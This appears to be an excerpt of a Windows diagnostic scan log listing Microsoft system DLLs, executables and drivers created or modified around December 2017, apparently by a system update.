2017-12-12 23:00 - 2017-12-07 23:09 - 000136704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gamingtcui.dll
2017-12-12 23:00 - 2017-12-07 23:08 - 019336192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-12-12 23:00 - 2017-12-07 23:08 - 000514560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iprtrmgr.dll
2017-12-12 23:00 - 2017-12-07 23:08 - 000450048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TileDataRepository.dll
2017-12-12 23:00 - 2017-12-07 23:08 - 000369152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-12-12 23:00 - 2017-12-07 23:08 - 000206336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scrobj.dll
2017-12-12 23:00 - 2017-12-07 23:08 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2017-12-12 23:00 - 2017-12-07 23:07 - 000365568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-12-12 23:00 - 2017-12-07 23:07 - 000254976 _____ (Microsoft Corporation) C:\WINDOWS\system32\PushToInstall.dll
2017-12-12 23:00 - 2017-12-07 23:07 - 000246272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2017-12-12 23:00 - 2017-12-07 23:07 - 000192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys
2017-12-12 23:00 - 2017-12-07 23:07 - 000172544 _____ (Microsoft Corporation) C:\WINDOWS\system32\itss.dll
2017-12-12 23:00 - 2017-12-07 23:07 - 000164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcertinst.exe
2017-12-12 23:00 - 2017-12-07 23:07 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2017-12-12 23:00 - 2017-12-07 23:06 - 023652864 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-12-12 23:00 - 2017-12-07 23:06 - 000676352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll
2017-12-12 23:00 - 2017-12-07 23:06 - 000559104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2017-12-12 23:00 - 2017-12-07 23:06 - 000174080 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingtcui.dll
2017-12-12 23:00 - 2017-12-07 23:06 - 000164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscript.exe
2017-12-12 23:00 - 2017-12-07 23:05 - 006037504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-12-12 23:00 - 2017-12-07 23:05 - 001670656 _____ (Microsoft Corporation) C:\WINDOWS\system32\batmeter.dll
2017-12-12 23:00 - 2017-12-07 23:05 - 000664576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2017-12-12 23:00 - 2017-12-07 23:05 - 000559616 _____ (Microsoft Corporation) C:\WINDOWS\system32\iprtrmgr.dll
2017-12-12 23:00 - 2017-12-07 23:05 - 000539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\HolographicExtensions.dll
2017-12-12 23:00 - 2017-12-07 23:05 - 000481792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppcext.dll
2017-12-12 23:00 - 2017-12-07 23:05 - 000463360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-12-12 23:00 - 2017-12-07 23:05 - 000431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-12-12 23:00 - 2017-12-07 23:05 - 000363008 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-12-12 23:00 - 2017-12-07 23:05 - 000334848 _____ (Microsoft Corporation) C:\WINDOWS\system32\dusmsvc.dll
2017-12-12 23:00 - 2017-12-07 23:05 - 000306688 _____ (Microsoft Corporation) C:\WINDOWS\system32\FSClient.dll
2017-12-12 23:00 - 2017-12-07 23:05 - 000222208 _____ (Microsoft Corporation) C:\WINDOWS\system32\scrobj.dll
2017-12-12 23:00 - 2017-12-07 23:05 - 000164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\cscript.exe
2017-12-12 23:00 - 2017-12-07 23:05 - 000019456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slcext.dll
2017-12-12 23:00 - 2017-12-07 23:04 - 003678208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-12-12 23:00 - 2017-12-07 23:04 - 001498112 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2017-12-12 23:00 - 2017-12-07 23:04 - 001321472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2017-12-12 23:00 - 2017-12-07 23:04 - 000568832 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-12-12 23:00 - 2017-12-07 23:03 - 002467840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-12-12 23:00 - 2017-12-07 23:03 - 001559552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-12-12 23:00 - 2017-12-07 23:03 - 001230848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usercpl.dll
2017-12-12 23:00 - 2017-12-07 23:03 - 000841728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2017-12-12 23:00 - 2017-12-07 23:03 - 000708096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2017-12-12 23:00 - 2017-12-07 23:03 - 000708096 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2017-12-12 23:00 - 2017-12-07 23:03 - 000594944 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-12-12 23:00 - 2017-12-07 23:03 - 000403968 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-12-12 23:00 - 2017-12-07 23:03 - 000308736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2017-12-12 23:00 - 2017-12-07 23:03 - 000085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\hascsp.dll
2017-12-12 23:00 - 2017-12-07 23:02 - 007545344 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-12-12 23:00 - 2017-12-07 23:02 - 002864640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll
2017-12-12 23:00 - 2017-12-07 23:02 - 002117632 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnidui.dll
2017-12-12 23:00 - 2017-12-07 23:02 - 000815616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-12-12 23:00 - 2017-12-07 23:02 - 000813056 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-12-12 23:00 - 2017-12-07 23:02 - 000496640 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll
2017-12-12 23:00 - 2017-12-07 23:01 - 008097280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-12-12 23:00 - 2017-12-07 23:01 - 004592640 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2017-12-12 23:00 - 2017-12-07 23:01 - 001980928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll
2017-12-12 23:00 - 2017-12-07 23:01 - 000601088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2017-12-12 23:00 - 2017-12-07 23:01 - 000021504 _____ (Microsoft Corporation) C:\WINDOWS\system32\slcext.dll
2017-12-12 23:00 - 2017-12-07 23:00 - 004740608 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-12-12 23:00 - 2017-12-07 23:00 - 002862080 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-12-12 23:00 - 2017-12-07 23:00 - 001509888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2017-12-12 23:00 - 2017-12-07 22:59 - 003121664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.dll
2017-12-12 23:00 - 2017-12-07 22:59 - 002105856 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-12-12 23:00 - 2017-12-07 22:59 - 001666048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2017-12-12 23:00 - 2017-12-07 22:59 - 001058304 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2017-12-12 23:00 - 2017-12-07 22:59 - 000880640 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2017-12-12 23:00 - 2017-12-07 22:58 - 003478016 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll
2017-12-12 23:00 - 2017-12-07 22:58 - 003211776 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2017-12-12 23:00 - 2017-12-07 22:58 - 001547264 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2017-12-12 23:00 - 2017-12-07 22:58 - 001353728 _____ (Microsoft Corporation) C:\WINDOWS\system32\usercpl.dll
2017-12-12 23:00 - 2017-12-07 22:58 - 000812032 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2017-12-12 23:00 - 2017-12-07 22:57 - 001822208 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-12-12 23:00 - 2017-12-07 22:57 - 001487872 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-12-12 23:00 - 2017-12-07 22:56 - 002666496 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll
2017-12-12 23:00 - 2017-12-07 22:56 - 001739264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2017-12-12 23:00 - 2017-12-07 22:56 - 000685056 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-12-12 23:00 - 2017-12-07 22:54 - 002510336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-12-12 23:00 - 2017-12-07 22:54 - 001570816 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2017-12-12 23:00 - 2017-12-07 22:54 - 001160704 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-12-12 23:00 - 2017-11-26 21:35 - 017084416 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramCompositor.dll
2017-12-12 23:00 - 2017-11-26 21:32 - 021754368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Hydrogen.dll
2017-12-12 23:00 - 2017-11-26 21:15 - 000882688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Mirage.Internal.dll
2017-12-12 23:00 - 2017-11-26 17:43 - 000618496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Mirage.Internal.dll
2017-12-12 23:00 - 2017-11-26 14:48 - 001200536 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-12-12 23:00 - 2017-11-26 14:47 - 001053592 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-12-12 23:00 - 2017-11-26 14:45 - 001642520 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d9.dll
2017-12-12 23:00 - 2017-11-26 14:45 - 000319352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
2017-12-12 23:00 - 2017-11-26 14:45 - 000264040 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2017-12-12 23:00 - 2017-11-26 14:45 - 000198888 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-12-12 23:00 - 2017-11-26 14:41 - 000285080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2017-12-12 23:00 - 2017-11-26 14:38 - 001636376 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-12-12 23:00 - 2017-11-26 14:37 - 001277848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-12-12 23:00 - 2017-11-26 14:35 - 001090440 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-12-12 23:00 - 2017-11-26 14:35 - 000924136 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-12-12 23:00 - 2017-11-26 14:33 - 002395032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-12-12 23:00 - 2017-11-26 14:33 - 001208184 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-12-12 23:00 - 2017-11-26 14:33 - 000471960 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2017-12-12 23:00 - 2017-11-26 14:33 - 000398744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fltMgr.sys
2017-12-12 23:00 - 2017-11-26 14:32 - 000373656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2017-12-12 23:00 - 2017-11-26 14:32 - 000082840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\volmgr.sys
2017-12-12 23:00 - 2017-11-26 14:31 - 000187288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2017-12-12 23:00 - 2017-11-26 14:30 - 001488792 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2017-12-12 23:00 - 2017-11-26 14:29 - 003010720 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2017-12-12 23:00 - 2017-11-26 14:29 - 002573208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-12-12 23:00 - 2017-11-26 14:29 - 000891800 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-12-12 23:00 - 2017-11-26 14:29 - 000840440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Perception.Stub.dll
2017-12-12 23:00 - 2017-11-26 14:29 - 000749976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-12-12 23:00 - 2017-11-26 14:29 - 000703536 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2017-12-12 23:00 - 2017-11-26 14:29 - 000436120 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2017-12-12 23:00 - 2017-11-26 14:28 - 001259344 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2017-12-12 23:00 - 2017-11-26 14:28 - 001012120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Services.TargetedContent.dll
2017-12-12 23:00 - 2017-11-26 14:28 - 000713624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2017-12-12 23:00 - 2017-11-26 14:28 - 000495000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2017-12-12 23:00 - 2017-11-26 14:28 - 000149400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2017-12-12 23:00 - 2017-11-26 14:27 - 002446744 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-12-12 23:00 - 2017-11-26 14:27 - 002412168 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2017-12-12 23:00 - 2017-11-26 14:27 - 001413760 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-12-12 23:00 - 2017-11-26 14:27 - 000464408 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcryptprimitives.dll
2017-12-12 23:00 - 2017-11-26 14:27 - 000230296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-12-12 23:00 - 2017-11-26 14:26 - 000428952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2017-12-12 23:00 - 2017-11-26 14:26 - 000048112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2017-12-12 23:00 - 2017-11-26 14:25 - 000902416 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll
2017-12-12 23:00 - 2017-11-26 14:23 - 001694224 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-12-12 23:00 - 2017-11-26 14:23 - 001054280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2017-12-12 23:00 - 2017-11-26 14:23 - 000754688 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll
2017-12-12 23:00 - 2017-11-26 14:22 - 000404888 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-12-12 23:00 - 2017-11-26 14:21 - 001585376 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-12-12 23:00 - 2017-11-26 14:21 - 000654048 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2017-12-12 23:00 - 2017-11-26 14:20 - 000615768 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2017-12-12 23:00 - 2017-11-26 14:20 - 000519152 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-12-12 23:00 - 2017-11-26 13:57 - 001664000 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2017-12-12 23:00 - 2017-11-26 13:55 - 001289216 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-12-12 23:00 - 2017-11-26 13:55 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcGenral.dll
2017-12-12 23:00 - 2017-11-26 13:55 - 000301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcLayers.dll
2017-12-12 23:00 - 2017-11-26 13:55 - 000211456 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2017-12-12 23:00 - 2017-11-26 13:55 - 000175104 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll
2017-12-12 23:00 - 2017-11-26 13:55 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceUpdateAgent.dll
2017-12-12 23:00 - 2017-11-26 13:54 - 000327680 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-12-12 23:00 - 2017-11-26 13:54 - 000092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\usoapi.dll
2017-12-12 23:00 - 2017-11-26 13:48 - 012829696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-12-12 23:00 - 2017-11-26 13:47 - 002890240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-12-12 23:00 - 2017-11-26 13:43 - 000239104 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreenps.dll
2017-12-12 23:00 - 2017-11-26 13:36 - 000204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\provisioningcsp.dll
2017-12-12 23:00 - 2017-11-26 13:36 - 000169472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-12-12 23:00 - 2017-11-26 13:36 - 000168448 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_SIUF.dll
2017-12-12 23:00 - 2017-11-26 13:36 - 000041472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vwifimp.sys
2017-12-12 23:00 - 2017-11-26 13:35 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_ContentDeliveryManager.dll
2017-12-12 23:00 - 2017-11-26 13:35 - 000057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuautoappupdate.dll
2017-12-12 23:00 - 2017-11-26 13:34 - 000126464 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptcatsvc.dll
2017-12-12 23:00 - 2017-11-26 13:33 - 000361984 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpatializerApo.dll
2017-12-12 23:00 - 2017-11-26 13:31 - 001495040 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-12-12 23:00 - 2017-11-26 13:31 - 000529408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2017-12-12 23:00 - 2017-11-26 13:31 - 000115200 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2017-12-12 23:00 - 2017-11-26 13:31 - 000073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\provtool.exe
2017-12-12 23:00 - 2017-11-26 13:29 - 000474112 _____ (Microsoft Corporation) C:\WINDOWS\system32\DictationManager.dll
2017-12-12 23:00 - 2017-11-26 13:29 - 000432640 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-12-12 23:00 - 2017-11-26 13:29 - 000424960 _____ (Microsoft Corporation) C:\WINDOWS\system32\provhandlers.dll
2017-12-12 23:00 - 2017-11-26 13:29 - 000238080 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceSetupManager.dll
2017-12-12 23:00 - 2017-11-26 13:28 - 000394752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ks.sys
2017-12-12 23:00 - 2017-11-26 13:26 - 000830464 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d9on12.dll
2017-12-12 23:00 - 2017-11-26 13:26 - 000770048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2017-12-12 23:00 - 2017-11-26 13:26 - 000432640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2017-12-12 23:00 - 2017-11-26 13:25 - 001425408 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-12-12 23:00 - 2017-11-26 13:25 - 000516096 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-12-12 23:00 - 2017-11-26 13:25 - 000354304 _____ (Microsoft Corporation) C:\WINDOWS\system32\WwaApi.dll
2017-12-12 23:00 - 2017-11-26 13:25 - 000292864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExecModelClient.dll
2017-12-12 23:00 - 2017-11-26 13:25 - 000266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2017-12-12 23:00 - 2017-11-26 13:23 - 000588288 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2017-12-12 23:00 - 2017-11-26 13:22 - 000720896 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-12-12 23:00 - 2017-11-26 13:19 - 001167360 _____ (Microsoft Corporation) C:\WINDOWS\system32\ISM.dll
2017-12-12 23:00 - 2017-11-26 13:19 - 000887296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
2017-12-12 23:00 - 2017-11-26 13:19 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadjcsp.dll
2017-12-12 23:00 - 2017-11-26 13:18 - 003186688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.CloudStore.dll
2017-12-12 23:00 - 2017-11-26 13:18 - 001424896 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2017-12-12 23:00 - 2017-11-26 13:18 - 000556544 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-12-12 23:00 - 2017-11-26 13:17 - 003334144 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-12-12 23:00 - 2017-11-26 13:17 - 002208768 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-12-12 23:00 - 2017-11-26 13:17 - 001054720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-12-12 23:00 - 2017-11-26 13:08 - 017159680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-12-12 23:00 - 2017-11-26 13:05 - 000462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-12-12 23:00 - 2017-11-26 13:04 - 003578368 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-12-12 23:00 - 2017-11-26 13:04 - 002596352 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2017-12-12 23:00 - 2017-11-26 13:03 - 004772352 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-12-12 23:00 - 2017-11-26 13:03 - 002783744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-12-12 23:00 - 2017-11-26 13:01 - 003163648 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-12-12 23:00 - 2017-11-26 13:00 - 000899584 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2017-12-12 23:00 - 2017-11-26 12:59 - 004814848 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-12-12 23:00 - 2017-11-26 12:59 - 000726016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-12-12 23:00 - 2017-11-26 12:59 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-12-12 23:00 - 2017-11-26 12:59 - 000259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys
2017-12-12 23:00 - 2017-11-26 12:58 - 000151040 _____ (Microsoft Corporation) C:\WINDOWS\system32\umpo.dll
2017-12-12 23:00 - 2017-11-26 12:48 - 000534528 _____ (Microsoft Corporation) C:\WINDOWS\system32\apphelp.dll
2017-12-12 23:00 - 2017-11-26 12:48 - 000079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\acppage.dll
2017-12-12 23:00 - 2017-11-26 12:21 - 001474680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d9.dll
2017-12-12 23:00 - 2017-11-26 12:21 - 001432816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-12-12 23:00 - 2017-11-26 12:02 - 001124760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContentDeliveryManager.Utilities.dll
2017-12-12 23:00 - 2017-11-26 12:01 - 002339296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2017-12-12 23:00 - 2017-11-26 12:01 - 000791960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2017-12-12 23:00 - 2017-11-26 12:01 - 000746904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Services.TargetedContent.dll
2017-12-12 23:00 - 2017-11-26 12:01 - 000590944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2017-12-12 23:00 - 2017-11-26 12:01 - 000506256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Perception.Stub.dll
2017-12-12 23:00 - 2017-11-26 12:01 - 000354200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2017-12-12 23:00 - 2017-11-26 12:00 - 001990160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2017-12-12 23:00 - 2017-11-26 12:00 - 000353848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-12-12 23:00 - 2017-11-26 11:59 - 000703568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2017-12-12 23:00 - 2017-11-26 11:58 - 001148216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-12-12 23:00 - 2017-11-26 11:58 - 001057824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2017-12-12 23:00 - 2017-11-26 11:51 - 001558856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-12-12 23:00 - 2017-11-26 11:51 - 000661664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2017-12-12 23:00 - 2017-11-26 11:41 - 002393600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcGenral.dll
2017-12-12 23:00 - 2017-11-26 11:41 - 001470976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2017-12-12 23:00 - 2017-11-26 11:41 - 000372224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcLayers.dll
2017-12-12 23:00 - 2017-11-26 11:41 - 000133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\t2embed.dll
2017-12-12 23:00 - 2017-11-26 11:41 - 000065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usoapi.dll
2017-12-12 23:00 - 2017-11-26 11:40 - 000160256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smartscreenps.dll
2017-12-12 23:00 - 2017-11-26 11:38 - 000271872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SpatializerApo.dll
2017-12-12 23:00 - 2017-11-26 11:37 - 000098304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2017-12-12 23:00 - 2017-11-26 11:36 - 013703168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
